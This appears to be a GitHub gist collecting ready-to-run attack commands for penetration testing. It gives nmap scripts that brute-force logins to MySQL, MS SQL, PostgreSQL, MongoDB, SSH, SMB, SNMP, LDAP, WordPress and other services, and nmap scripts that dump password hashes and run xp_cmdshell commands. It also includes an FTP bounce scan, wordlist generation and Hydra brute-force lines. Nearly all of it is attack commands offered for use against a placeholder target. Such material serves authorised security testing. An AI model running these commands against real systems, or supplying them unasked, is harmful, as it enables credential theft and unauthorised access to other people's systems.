@random-robbie
Last active March 27, 2025 21:03

Network Service Brute Force Commands Collection

Database Services

MySQL

# Basic MySQL brute force
nmap --script=mysql-brute <target>

# MySQL brute force with custom credentials
nmap --script=mysql-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# MySQL enum
nmap -p 3306 --script mysql-enum <target>

# MySQL users enum
nmap -p 3306 --script mysql-users --script-args="mysqluser='root',mysqlpass='password'" <target>

# MySQL databases enum
nmap -p 3306 --script mysql-databases --script-args="mysqluser='root',mysqlpass='password'" <target>

# MySQL hashdump
nmap -p 3306 --script mysql-dump-hashes --script-args="username='root',password='password'" <target>

Microsoft SQL

# MS SQL brute force
nmap -p 1433 --script ms-sql-brute <target>

# MS SQL empty password check
nmap -p 1433 --script ms-sql-empty-password <target>

# MS SQL xp_cmdshell command execution (requires credentials)
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" <target>

# MS SQL information gathering
nmap -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password <target>

# MS SQL dump hashes
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=password <target>

PostgreSQL

# PostgreSQL brute force
nmap -p 5432 --script pgsql-brute <target>

# PostgreSQL brute force with specific credentials
nmap -p 5432 --script pgsql-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# PostgreSQL info gathering
nmap -p 5432 --script pgsql-info <target>

MongoDB

# MongoDB brute force
nmap -p 27017 --script mongodb-brute <target>

# MongoDB info gathering
nmap -p 27017 --script mongodb-info <target>

# MongoDB database list (no auth)
nmap -p 27017 --script mongodb-databases <target>

# MongoDB database list (with auth)
nmap -p 27017 --script mongodb-databases --script-args="mongodb-databases.username='admin',mongodb-databases.password='password'" <target>

Redis

# Redis brute force
nmap -p 6379 --script redis-brute <target>

# Redis info gathering
nmap -p 6379 --script redis-info <target>

# Redis key enumeration
nmap -p 6379 --script redis-keys <target>

Cassandra

# Cassandra brute force
nmap -p 9160 --script=cassandra-brute <target>

# Cassandra info gathering
nmap -p 9160 --script=cassandra-info <target>

Oracle

# Oracle SID enumeration
nmap -p 1521 --script oracle-sid-brute <target>

# Oracle brute force
nmap -p 1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>

# Oracle TNS version
nmap -p 1521 --script oracle-tns-version <target>

Web Services

Tomcat

# AJP Tomcat brute force
nmap -p 8009 --script ajp-brute <target>

# Tomcat manager brute force (HTTP)
nmap -p 8080 --script http-tomcat-manager-brute <target>

# Tomcat default credentials check
nmap -p 8080 --script http-default-accounts --script-args http-default-accounts.category=web <target>

WordPress

# WordPress brute force
nmap -p 80 --script http-wordpress-brute <target>

# WordPress user enumeration
nmap -p 80 --script http-wordpress-enum <target>

Joomla

# Joomla brute force
nmap -p 80 --script http-joomla-brute <target>

Drupal

# Drupal brute force (script args quoted so the shell does not split the command at each '&')
nmap -p 80 --script http-form-brute --script-args "http-form-brute.path=/drupal/,http-form-brute.method=POST,http-form-brute.form=form_id:user_login_form&name:^USER^&pass:^PASS^&op:Log+in" <target>

Email Services

POP3

# POP3 brute force
nmap -sV --script=pop3-brute <target>

# POP3 capabilities check
nmap -p 110 --script pop3-capabilities <target>

# POP3 with specific credentials
nmap -p 110 --script pop3-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

IMAP

# IMAP brute force
nmap -p 143 --script imap-brute <target>

# IMAP capabilities
nmap -p 143 --script imap-capabilities <target>

SMTP

# SMTP brute force
nmap -p 25 --script smtp-brute <target>

# SMTP user enumeration
nmap -p 25 --script smtp-enum-users <target>

# SMTP commands
nmap -p 25 --script smtp-commands <target>

Network Protocols

SNMP

# SNMP brute force (community strings)
nmap -sU --script snmp-brute <target>

# SNMP with custom communities list
nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/path/to/communities.txt <target>

# SNMP information gathering (with known community)
nmap -sU -p 161 --script snmp-info --script-args snmp-info.community=public <target>

# SNMP system processes
nmap -sU -p 161 --script snmp-processes --script-args snmp-processes.community=public <target>

SSH

# SSH brute force
nmap -p 22 --script ssh-brute --script-args userdb=/path/to/users.txt,passdb=/path/to/passwords.txt <target>

# SSH host key enumeration
nmap -p 22 --script ssh-hostkey <target>

# SSH supported authentication methods
nmap -p 22 --script ssh-auth-methods <target>

SIP/VoIP

# SIP brute force
nmap -sU -p 5060 --script=sip-brute <target>

# SIP methods enumeration
nmap -sU -p 5060 --script=sip-methods <target>

RDP

# RDP NTLM info (enumerates host and domain details via CredSSP; not a brute force)
nmap -p 3389 --script rdp-ntlm-info <target>

# RDP security check
nmap -p 3389 --script rdp-enum-encryption <target>

FTP

# FTP brute force
nmap -p 21 --script ftp-brute <target>

# FTP anonymous login
nmap -p 21 --script ftp-anon <target>

# FTP bounce (scan through FTP server)
nmap -b anonymous:password@<ftp_target> <scan_target>

SMB/NetBIOS

# SMB brute force
nmap -p 445 --script smb-brute <target>

# SMB OS discovery
nmap -p 445 --script smb-os-discovery <target>

# SMB security mode
nmap -p 445 --script smb-security-mode <target>

# SMB enum shares
nmap -p 445 --script smb-enum-shares <target>

# SMB enum users
nmap -p 445 --script smb-enum-users <target>

Other Services

RTSP (Media Streaming)

# RTSP URL brute force
nmap --script rtsp-url-brute -p 554 <target>

# RTSP methods
nmap --script rtsp-methods -p 554 <target>

XMPP (Jabber)

# XMPP brute force
nmap -p 5222 --script xmpp-brute <target>

# XMPP info
nmap -p 5222 --script xmpp-info <target>

IPMI

# IPMI brute force
nmap -sU -p 623 --script ipmi-brute <target>

# IPMI version and cipher suites
nmap -sU -p 623 --script ipmi-version <target>

LDAP

# LDAP brute force
nmap -p 389 --script ldap-brute <target>

# LDAP search
nmap -p 389 --script ldap-search <target>

# LDAP rootDSE
nmap -p 389 --script ldap-rootdse <target>

DNS

# DNS brute force subdomains
nmap --script dns-brute <domain>

# DNS zone transfer
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=<domain> <target>

Useful Nmap Options

# Timing options (faster scans)
-T4  # Aggressive timing
-T5  # Insane timing (may cause unreliable results)

# Authentication options
--script-args userdb=/path/to/usernames.txt,passdb=/path/to/passwords.txt

# Output options
-oN output.txt  # Normal output to file
-oX output.xml  # XML output
-oG output.grep # Grepable output

# Additional useful options
-Pn  # Skip host discovery
-sV  # Version detection
-A   # Aggressive scan (OS detection, version detection, script scanning, and traceroute)

Creating Custom Wordlists

# Generate custom wordlist from website
cewl -d 2 -m 5 http://target.com -w wordlist.txt

# Extract words from files in current directory (-h drops the "filename:" prefix that -r adds)
grep -r -a -o -h "\w\{5,\}" . | sort -u > wordlist.txt

# Generate username variations
john --wordlist=names.txt --rules=Wordlist --stdout > usernames.txt

Advanced Brute Force with Hydra

# HTTP POST form
hydra -l admin -P /path/to/passwords.txt <target> http-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"

# SSH
hydra -L /path/to/users.txt -P /path/to/passwords.txt <target> ssh

# FTP
hydra -l admin -P /path/to/passwords.txt <target> ftp

# MySQL
hydra -l root -P /path/to/passwords.txt <target> mysql

# RDP
hydra -L /path/to/users.txt -P /path/to/passwords.txt <target> rdp